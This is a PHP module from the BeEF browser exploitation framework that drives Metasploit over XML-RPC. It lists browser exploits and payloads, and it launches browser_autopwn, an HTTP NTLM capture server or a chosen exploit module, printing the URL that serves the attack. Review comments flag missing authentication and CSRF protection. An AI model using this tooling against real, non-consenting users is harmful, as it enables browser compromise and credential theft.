beef/ui/msf.php
wade@bindshell.net 03ffb4703d Initial Import
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2010-01-11 00:54:08 +00:00


<?php
// PHP Module for BeefSploit
// By Ryan Linn (sussurro@happypacket.net)
require_once('../include/xmlrpc.inc.php');
require_once("../include/common.inc.php");
require_once("../include/msf_filter.inc.php");
include("../include/msf.inc.php");
session_start();
// NOTE(review): no login or authorisation check is visible in this file before
// the RPC service is contacted; confirm that one of the includes enforces it.

// Placeholder markup returned instead of a module list when setup fails.
$msf_load_error = '<select name="" id="loading" onChange="">'
    . '<option value="">Load Failed! Check Logs</option>'
    . '</select>';

// Open the TCP connection to the Metasploit RPC service; bail out on failure.
$sock = msf_connect(MSF_HOST, MSF_PORT);
if ($sock === FALSE) {
    print $msf_load_error;
    exit;
}

// Authenticate and keep the session token used by every later request.
$token = xmlrpc_msf_login($sock, MSF_USER, MSF_PASS);
if ($token === FALSE) {
    print $msf_load_error;
    socket_close($sock);
    exit;
}
/**
 * Close the Metasploit socket when one is open, then end the script.
 *
 * @param mixed $sock Socket returned by msf_connect(), or FALSE when none exists.
 */
function close_socket_and_exit($sock) {
    // FALSE is the "no socket" marker used throughout this file.
    if ($sock !== FALSE) {
        socket_close($sock);
    }
    exit();
}
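// Dispatch on the requested action.
//
// The request parameters are read defensively: a missing or non-string
// "action" selects no branch instead of raising an undefined-index notice
// that would end up in the response body consumed by the UI.
//
// NOTE(review): every branch, including the ones that start a module, is
// reachable with a plain GET request. Confirm that access control and
// cross-site request forgery protection are enforced before this point.
$action = (isset($_GET["action"]) && is_string($_GET["action"])) ? $_GET["action"] : "";
$has_exploit = !empty($_GET["exploit"]);
$has_payload = !empty($_GET["payload"]);

if ($action === "getexploits") { // list exploits
    get_exploits($sock, $token);
} elseif ($action === "getpayloads" && $has_exploit) { // list payloads for an exploit
    $exploit = get_and_filter_exploit();
    if (!$exploit) close_socket_and_exit($sock);
    get_payloads($sock, $token, $exploit);
} elseif ($action === "getoptions" && $has_exploit && $has_payload) { // list options
    $exploit = get_and_filter_exploit();
    if (!$exploit) close_socket_and_exit($sock);
    $payload = get_and_filter_payload();
    if (!$payload) close_socket_and_exit($sock);
    get_options($sock, $token, $exploit, $payload);
} elseif ($action === "smbchallengecapture") { // run the SMB capture module
    $options = get_and_filter_smb_capture_options();
    if (!$options) close_socket_and_exit($sock);
    // Output file locations are fixed server-side, not taken from the request.
    $options["LOGFILE"] = TMP_DIR . 'logfile';
    $options["PWFILE"] = TMP_DIR . 'pwfile';
    execute_smb_capture($sock, $token, $options);
} elseif ($action === "browserautopwn") { // run the browser autopwn module
    $options = get_and_filter_module_options();
    if (!$options) close_socket_and_exit($sock);
    execute_browser_autopwn($sock, $token, $options);
} elseif ($action === "exploit") { // run a caller-selected exploit module
    $options = get_and_filter_module_options();
    if (!$options) close_socket_and_exit($sock);
    $exploit = get_and_filter_exploit();
    if (!$exploit) close_socket_and_exit($sock);
    execute_module($sock, $token, $exploit, $options);
}
// Unknown or incomplete requests fall through and only release the socket.
socket_close($sock);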
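// --[ XMLRPC GET EXPLOITS
/**
 * Request the exploit module list over XML-RPC and keep the browser modules.
 *
 * The reply is read in chunks until the closing methodResponse tag is seen.
 * A failed read or a closed connection ends the loop with an error; the
 * previous version kept looping forever in that case.
 *
 * @param mixed  $sock  Connected socket from msf_connect().
 * @param string $token Session token from xmlrpc_msf_login().
 * @return array|false Module names containing "browser", or FALSE on failure.
 */
function xmlrpc_get_exploits($sock, $token) {
    if (!$sock || !$token) {
        $error = "MSF get exploit error:\n";
        $error .= "- Socket and/or Token failed";
        beef_log($error, $error);
        return FALSE;
    }

    // construct request; a NUL byte is appended to the serialized message
    $msg = new xmlrpcmsg("module.exploits",
        array(new xmlrpcval($token, "string")));
    $string = $msg->serialize() . "\0";

    // send request
    socket_write($sock, $string);

    // get response
    $resp = "";
    while (strpos($resp, "/methodResponse") === false) {
        $chunk = socket_read($sock, 2048);
        // FALSE is a read error, "" means the peer closed the connection
        if ($chunk === false || $chunk === "") {
            $error = "MSF get exploit error:\n";
            $error .= "- Response from MSF Failed";
            beef_log($error, $error);
            return FALSE;
        }
        $resp .= $chunk;
    }
    // NUL bytes are stripped from the reply before it is decoded
    $resp = str_replace("\0", "", $resp);
    $t = php_xmlrpc_decode_xml($resp);

    // check error
    if ($t->errno) {
        $error = "MSF get exploit error:\n";
        $error .= "- Response from MSF Failed";
        beef_log($error, $error);
        return FALSE;
    }
    $val = $t->val;

    // extract exploits from response, keeping names that contain "browser"
    $modules = $val->structMem("modules");
    $exploits = array();
    for ($i = 0; $i < $modules->arraySize(); $i++) {
        $name = $modules->arrayMem($i)->scalarVal();
        if (strpos($name, "browser") !== false) {
            $exploits[] = $name;
        }
    }
    return $exploits;
}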
/**
 * Print the exploit list as an HTML select, or "fail" when it cannot be fetched.
 *
 * @param mixed  $sock  Connected socket from msf_connect().
 * @param string $token Session token from xmlrpc_msf_login().
 */
function get_exploits($sock, $token) {
    $module_names = xmlrpc_get_exploits($sock, $token);
    if ($module_names === FALSE) {
        print "fail";
        return;
    }
    // The third argument becomes the select's onChange handler.
    print construct_select('exploit', $module_names, 'msf_get_payload_list()');
}
/**
 * Print the payloads compatible with an exploit as an HTML select, or "fail".
 *
 * @param mixed  $sock    Connected socket from msf_connect().
 * @param string $token   Session token from xmlrpc_msf_login().
 * @param string $exploit Exploit module name.
 */
function get_payloads($sock, $token, $exploit) {
    $payload_names = xmlrpc_get_payloads($sock, $token, $exploit);
    if ($payload_names === FALSE) {
        print "fail";
        return;
    }
    // The third argument becomes the select's onChange handler.
    print construct_select('payload', $payload_names, 'msf_get_options()');
}
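/**
 * Print an options form covering both the exploit and the payload options.
 *
 * Either lookup can return FALSE. In that case "fail" is printed, as the
 * sibling get_exploits() and get_payloads() do, instead of passing FALSE to
 * array_merge().
 *
 * @param mixed  $sock    Connected socket from msf_connect().
 * @param string $token   Session token from xmlrpc_msf_login().
 * @param string $exploit Exploit module name.
 * @param string $payload Payload module name.
 */
function get_options($sock, $token, $exploit, $payload) {
    // get all options
    $exp_opt = xmlrpc_get_options($sock, $token, "exploit", $exploit);
    $pay_opt = xmlrpc_get_options($sock, $token, "payload", $payload);
    if ($exp_opt === FALSE || $pay_opt === FALSE) {
        print "fail";
        return;
    }
    // On a name clash the payload's entry replaces the exploit's entry.
    $full_options = array_merge($exp_opt, $pay_opt);
    print construct_options_form($full_options);
}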
/**
 * Start the fixed auxiliary module "server/capture/http_ntlm" and print its URL.
 *
 * Prints "fail" when the module cannot be started or the URL built from
 * MSF_BASE_URL, SRVPORT and URIPATH is rejected by valid_url_without_query().
 *
 * NOTE(review): the module has already been started when the URL check runs,
 * so a rejected URL leaves it running; confirm this ordering is intended.
 *
 * @param mixed  $sock    Connected socket from msf_connect().
 * @param string $token   Session token from xmlrpc_msf_login().
 * @param array  $options Module options; presumably SRVPORT and URIPATH are
 *                        guaranteed by the caller's filter - verify.
 */
function execute_smb_capture($sock, $token, $options) {
    $started = xmlrpc_execute_module($sock, $token, "server/capture/http_ntlm", "auxiliary", $options);
    if ($started === FALSE) {
        print "fail";
        return;
    }

    $url = MSF_BASE_URL . ":" . $options["SRVPORT"] . "/" . $options["URIPATH"];
    if (valid_url_without_query($url)) {
        beef_log("SMB Exploit Launched", "SMB Exploit Launched. Waiting for Metasploit to send URL");
        print $url;
        return;
    }
    print "fail";
}
/**
 * Start the fixed auxiliary module "server/browser_autopwn" and print its URL.
 *
 * Prints "fail" when the module cannot be started or the URL built from
 * MSF_BASE_URL, SRVPORT and URIPATH is rejected by valid_url_without_query().
 *
 * NOTE(review): the module has already been started when the URL check runs,
 * so a rejected URL leaves it running; confirm this ordering is intended.
 *
 * @param mixed  $sock    Connected socket from msf_connect().
 * @param string $token   Session token from xmlrpc_msf_login().
 * @param array  $options Module options; presumably SRVPORT and URIPATH are
 *                        guaranteed by the caller's filter - verify.
 */
function execute_browser_autopwn($sock, $token, $options) {
    $started = xmlrpc_execute_module($sock, $token, "server/browser_autopwn", "auxiliary", $options);
    if ($started === FALSE) {
        print "fail";
        return;
    }

    $url = MSF_BASE_URL . ":" . $options["SRVPORT"] . "/" . $options["URIPATH"];
    if (valid_url_without_query($url)) {
        beef_log("Autopwn Exploit Launched", "Autopwn Exploit Launched. Waiting for Metasploit to send URL");
        print $url;
        return;
    }
    print "fail";
}
/**
 * Start the named module with type "exploit" and print the URL it serves on.
 *
 * Prints "fail" when the module cannot be started or the URL built from
 * MSF_BASE_URL, SRVPORT and URIPATH is rejected by valid_url_without_query().
 *
 * NOTE(review): the module has already been started when the URL check runs,
 * so a rejected URL leaves it running; confirm this ordering is intended.
 *
 * @param mixed  $sock    Connected socket from msf_connect().
 * @param string $token   Session token from xmlrpc_msf_login().
 * @param string $module  Module name; it is also written to the log.
 * @param array  $options Module options; presumably SRVPORT and URIPATH are
 *                        guaranteed by the caller's filter - verify.
 */
function execute_module($sock, $token, $module, $options) {
    $started = xmlrpc_execute_module($sock, $token, $module, "exploit", $options);
    if ($started === FALSE) {
        print "fail";
        return;
    }

    $url = MSF_BASE_URL . ":" . $options["SRVPORT"] . "/" . $options["URIPATH"];
    if (valid_url_without_query($url)) {
        beef_log("Exploit ($module) Launched", "Exploit ($module) Launched. Waiting for Metasploit to send URL");
        print $url;
        return;
    }
    print "fail";
}
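// --[ XMLRPC GET PAYLOADS
/**
 * Request the payloads compatible with an exploit over XML-RPC.
 *
 * The reply is read in chunks until the closing methodResponse tag is seen,
 * as xmlrpc_get_exploits() does. A single socket_read() can return only part
 * of a reply on a TCP stream, and a partial reply fails to decode. Failures
 * are logged like the sibling functions log theirs.
 *
 * @param mixed  $sock    Connected socket from msf_connect().
 * @param string $token   Session token from xmlrpc_msf_login().
 * @param string $exploit Exploit module name.
 * @return array|false Payload names, or FALSE on failure.
 */
function xmlrpc_get_payloads($sock, $token, $exploit) {
    if (!$sock || !$token || !$exploit) {
        $error = "MSF get payloads error:\n";
        $error .= "- Socket, Token and/or Exploit failed";
        beef_log($error, $error);
        return FALSE;
    }

    // construct request; a NUL byte is appended to the serialized message
    $msg = new xmlrpcmsg("module.compatible_payloads",
        array(new xmlrpcval($token, "string"),
              new xmlrpcval($exploit, "string")));
    $string = $msg->serialize() . "\0";

    // send request
    socket_write($sock, $string);

    // get response
    $resp = "";
    while (strpos($resp, "/methodResponse") === false) {
        $chunk = socket_read($sock, 32768);
        // FALSE is a read error, "" means the peer closed the connection
        if ($chunk === false || $chunk === "") {
            $error = "MSF get payloads error:\n";
            $error .= "- Response from MSF Failed";
            beef_log($error, $error);
            return FALSE;
        }
        $resp .= $chunk;
    }
    $resp = str_replace("\0", "", $resp);
    $t = php_xmlrpc_decode_xml($resp);

    // check error
    if ($t->errno) {
        $error = "MSF get payloads error:\n";
        $error .= "- Response from MSF Failed";
        beef_log($error, $error);
        return FALSE;
    }
    $val = $t->val;

    // extract payloads from response
    $modules = $val->structMem("payloads");
    $payloads = array();
    for ($i = 0; $i < $modules->arraySize(); $i++) {
        $payloads[] = $modules->arrayMem($i)->scalarVal();
    }
    return $payloads;
}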
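// --[ XMLRPC GET OPTIONS
/**
 * Request the option descriptions of a module over XML-RPC.
 *
 * The reply is read in chunks until the closing methodResponse tag is seen,
 * as xmlrpc_get_exploits() does. A single socket_read() can return only part
 * of a reply on a TCP stream, and a partial reply fails to decode.
 *
 * @param mixed  $sock   Connected socket from msf_connect().
 * @param string $token  Session token from xmlrpc_msf_login().
 * @param string $type   Module type; callers in this file pass "exploit" or "payload".
 * @param string $module Module name.
 * @return array|false Map of option name to a map of that option's attributes,
 *                     or FALSE on failure.
 */
function xmlrpc_get_options($sock, $token, $type, $module) {
    if (!$sock || !$token || !$type || !$module) {
        $error = "MSF get options error:\n";
        $error .= "- Socket, Token, Type and/or Module failed";
        beef_log($error, $error);
        return FALSE;
    }

    // construct request; a NUL byte is appended to the serialized message
    $msg = new xmlrpcmsg("module.options",
        array(new xmlrpcval($token, "string"),
              new xmlrpcval($type, "string"),
              new xmlrpcval($module, "string")
        ));
    $string = $msg->serialize() . "\0";

    // send request
    socket_write($sock, $string);

    // get response
    $resp = "";
    while (strpos($resp, "/methodResponse") === false) {
        $chunk = socket_read($sock, 32768);
        // FALSE is a read error, "" means the peer closed the connection
        if ($chunk === false || $chunk === "") {
            $error = "MSF get options error:\n";
            $error .= "- Response from MSF Failed";
            beef_log($error, $error);
            return FALSE;
        }
        $resp .= $chunk;
    }
    $resp = str_replace("\0", "", $resp);
    $t = php_xmlrpc_decode_xml($resp);

    // check error
    if ($t->errno) {
        $error = "MSF get options error:\n";
        $error .= "- Response from MSF Failed";
        beef_log($error, $error);
        return FALSE;
    }

    // extract options from response: outer struct is keyed by option name,
    // each inner struct holds that option's attributes as scalars
    $val = $t->val;
    $val->structreset();
    $options = array();
    while (list($key, $v) = $val->structEach()) {
        $v->structreset();
        $options[$key] = array();
        while (list($k, $v2) = $v->structEach()) {
            $options[$key][$k] = $v2->scalarVal();
        }
    }
    return $options;
}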
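// --[ XMLRPC EXECUTE MODULE
/**
 * Ask Metasploit over XML-RPC to run a module with the given options.
 *
 * The reply is read in chunks until the closing methodResponse tag is seen,
 * as xmlrpc_get_exploits() does. A single socket_read() can return only part
 * of a reply on a TCP stream, and a partial reply fails to decode.
 *
 * @param mixed  $sock    Connected socket from msf_connect().
 * @param string $token   Session token from xmlrpc_msf_login().
 * @param string $module  Module name.
 * @param string $type    Module type; callers in this file pass "auxiliary" or "exploit".
 * @param array  $options Non-empty map of option name to value; every value is
 *                        sent as an XML-RPC string.
 * @return bool TRUE when the call returned without error, FALSE otherwise.
 */
function xmlrpc_execute_module($sock, $token, $module, $type, $options) {
    if (!$sock || !$token || !$module || !$type || !$options || !is_array($options)) {
        $error = "MSF execute module error:\n";
        $error .= "- Socket, Token, Name, Type and/or Options failed";
        beef_log($error, $error);
        return FALSE;
    }

    // create request: wrap each option value as an XML-RPC string
    $optval = new xmlrpcval;
    $o = array();
    foreach ($options as $k => $v) {
        $o[$k] = new xmlrpcval($v, "string");
    }
    $optval->addStruct($o);
    $msg = new xmlrpcmsg("module.execute",           // method name
        array(new xmlrpcval($token, "string"),       // params
              new xmlrpcval($type, "string"),
              new xmlrpcval($module, "string"),      // metasploit module
              $optval));
    $string = $msg->serialize() . "\0";

    // send request
    socket_write($sock, $string);

    // get response
    $resp = "";
    while (strpos($resp, "/methodResponse") === false) {
        $chunk = socket_read($sock, 2048);
        // FALSE is a read error, "" means the peer closed the connection
        if ($chunk === false || $chunk === "") {
            $error = "MSF execute module error:\n";
            $error .= "- Calling $module failed";
            beef_log($error, $error);
            return FALSE;
        }
        $resp .= $chunk;
    }
    $resp = str_replace("\0", "", $resp);
    $t = php_xmlrpc_decode_xml($resp);

    // check error
    if ($t->errno) {
        $error = "MSF execute module error:\n";
        $error .= "- Calling $module failed";
        beef_log($error, $error);
        return FALSE;
    }
    return TRUE;
}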
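// --[ MSF LOGIN
/**
 * Log in to Metasploit over XML-RPC and return the session token.
 *
 * The reply is read in chunks until the closing methodResponse tag is seen,
 * as xmlrpc_get_exploits() does, so a reply split across reads still decodes.
 * A reply that decodes without a "token" member is treated as a failed login
 * instead of calling a method on a missing value.
 *
 * @param mixed  $sock     Connected socket from msf_connect().
 * @param string $username RPC user name.
 * @param string $password RPC password.
 * @return string|false Session token, or FALSE on failure.
 */
function xmlrpc_msf_login($sock, $username, $password)
{
    // create login request; a NUL byte is appended to the serialized message
    $msg = new xmlrpcmsg("auth.login",
        array(new xmlrpcval($username, "string"),
              new xmlrpcval($password, "string")));
    $string = $msg->serialize() . "\0";

    // send login request
    socket_write($sock, $string);

    // get login response
    $resp = "";
    while (strpos($resp, "/methodResponse") === false) {
        $chunk = socket_read($sock, 2048);
        // FALSE is a read error, "" means the peer closed the connection
        if ($chunk === false || $chunk === "") {
            $login_error = "MSF login error:\n";
            $login_error .= "- No response from MSF to the login request";
            beef_log($login_error, $login_error);
            return FALSE;
        }
        $resp .= $chunk;
    }
    $resp = str_replace("\0", "", $resp);
    $t = php_xmlrpc_decode_xml($resp);

    // check if login failed
    if ($t->errno) {
        $login_error = "MSF login error:\n";
        $login_error .= "- Check MSF_USER and MSF_PASS settings are correct";
        beef_log($login_error, $login_error);
        return FALSE;
    }

    // login successful so return session token
    $token = $t->val->structmem("token");
    if (!is_object($token)) {
        $login_error = "MSF login error:\n";
        $login_error .= "- Login response did not contain a token";
        beef_log($login_error, $login_error);
        return FALSE;
    }
    return $token->scalarval();
}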
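// --[ MSF CONNECT
/**
 * Open a TCP connection to the Metasploit RPC service.
 *
 * Every failure is logged through beef_log(). When the connect step fails,
 * the socket that was already created is closed before returning, so a
 * failed attempt does not leak it.
 *
 * @param string $host Host name or address of the service.
 * @param mixed  $port TCP port of the service.
 * @return mixed Connected socket, or FALSE on failure.
 */
function msf_connect($host, $port)
{
    if (!$host) {
        $connect_error = "MSF connect error:\n";
        $connect_error .= "- Invalid MSF_HOST variable setting";
        beef_log($connect_error, $connect_error);
        return FALSE;
    }
    if (!$port) {
        $connect_error = "MSF connect error:\n";
        $connect_error .= "- Invalid MSF_PORT variable setting";
        beef_log($connect_error, $connect_error);
        return FALSE;
    }

    // Warnings are suppressed because each failure is logged below instead.
    $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if ($sock === FALSE) {
        $connect_error = "MSF connect error:\n";
        $connect_error .= "- Create socket failed";
        beef_log($connect_error, $connect_error);
        return FALSE;
    }

    $connected = @socket_connect($sock, $host, $port);
    if (!$connected) {
        $connect_error = "MSF connect error:\n";
        $connect_error .= "- Cannot connect to MSF: " . $host . ":" . $port;
        beef_log($connect_error, $connect_error);
        // release the socket created above
        socket_close($sock);
        return FALSE;
    }
    return $sock;
}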
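// --[ CONSTRUCT SELECT
/**
 * Build an HTML <select> element from a list of values.
 *
 * The values are sorted, and each one becomes an <option> whose value and
 * label are the same text. Everything interpolated into the markup is
 * HTML-escaped, so a value containing quotes or angle brackets cannot break
 * out of its attribute or element. Lines end with a real newline; the
 * previous single-quoted '\n' emitted a literal backslash and "n".
 *
 * @param string $name     Used for both the name and the id attribute.
 * @param array  $values   Option values.
 * @param string $onchange JavaScript for the onChange attribute; ";" is appended.
 * @return string The select markup followed by a blank line.
 */
function construct_select($name, $values, $onchange) {
    sort($values);

    // ENT_SUBSTITUTE keeps text with invalid UTF-8 from collapsing to "".
    $flags = defined('ENT_SUBSTITUTE') ? (ENT_QUOTES | ENT_SUBSTITUTE) : ENT_QUOTES;
    $safe_name = htmlspecialchars((string) $name, $flags, 'UTF-8');
    $safe_handler = htmlspecialchars((string) $onchange, $flags, 'UTF-8');

    // start select
    $return_select = '<select name="' . $safe_name . '" id="' . $safe_name
        . '" onChange="' . $safe_handler . ';">' . "\n";
    foreach ($values as $value) {
        $safe_value = htmlspecialchars((string) $value, $flags, 'UTF-8');
        $return_select .= '<option value="' . $safe_value . '">' . $safe_value . '</option>' . "\n";
    }

    // terminate select
    $return_select .= "</select>\n";
    return $return_select . "\n";
}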
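// --[ CONSTRUCT OPTIONS FORM
/**
 * Build the HTML form fields for a module's options.
 *
 * Options flagged advanced or evasion, and options of type "bool", are left
 * out. Each remaining option gets a heading, its description and a text input
 * pre-filled with its default. Option names, descriptions and defaults come
 * from the RPC reply and are HTML-escaped before being placed in the markup.
 * Attributes missing from an option are treated as unset instead of raising
 * notices.
 *
 * @param array $options Map of option name to a map of its attributes; the
 *                       attributes read here are advanced, evasion, type,
 *                       required, desc and default.
 * @return string Form markup; empty when $options is not an array.
 */
function construct_options_form($options) {
    $options_form = "";
    if (!is_array($options)) {
        return $options_form;
    }

    // ENT_SUBSTITUTE keeps text with invalid UTF-8 from collapsing to "".
    $flags = defined('ENT_SUBSTITUTE') ? (ENT_QUOTES | ENT_SUBSTITUTE) : ENT_QUOTES;

    // construct options to be displayed in the browser
    foreach ($options as $key => $value) {
        // don't display advanced, evasion and boolean options
        $is_advanced = isset($value["advanced"]) && $value["advanced"] == 1;
        $is_evasion = isset($value["evasion"]) && $value["evasion"] == 1;
        $is_bool = isset($value["type"]) && $value["type"] == "bool";
        if ($is_advanced || $is_evasion || $is_bool) {
            continue;
        }

        $safe_key = htmlspecialchars((string) $key, $flags, 'UTF-8');
        $desc = isset($value["desc"]) ? $value["desc"] : "";
        $default = isset($value["default"]) ? $value["default"] : "";

        // create heading
        $options_form .= "<div id=\"module_subsection_header\">";
        $options_form .= $safe_key;
        if (isset($value["required"]) && $value["required"] == 1) {
            $options_form .= " (required)";
        }
        $options_form .= ": </div>\n";

        // create description
        $options_form .= htmlspecialchars((string) $desc, $flags, 'UTF-8') . "<br>";

        // create input box
        $options_form .= "<input type=\"text\" name=\"" . $safe_key . "\" value=\""
            . htmlspecialchars((string) $default, $flags, 'UTF-8') . "\"/>\n";
    }
    return $options_form;
}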
?>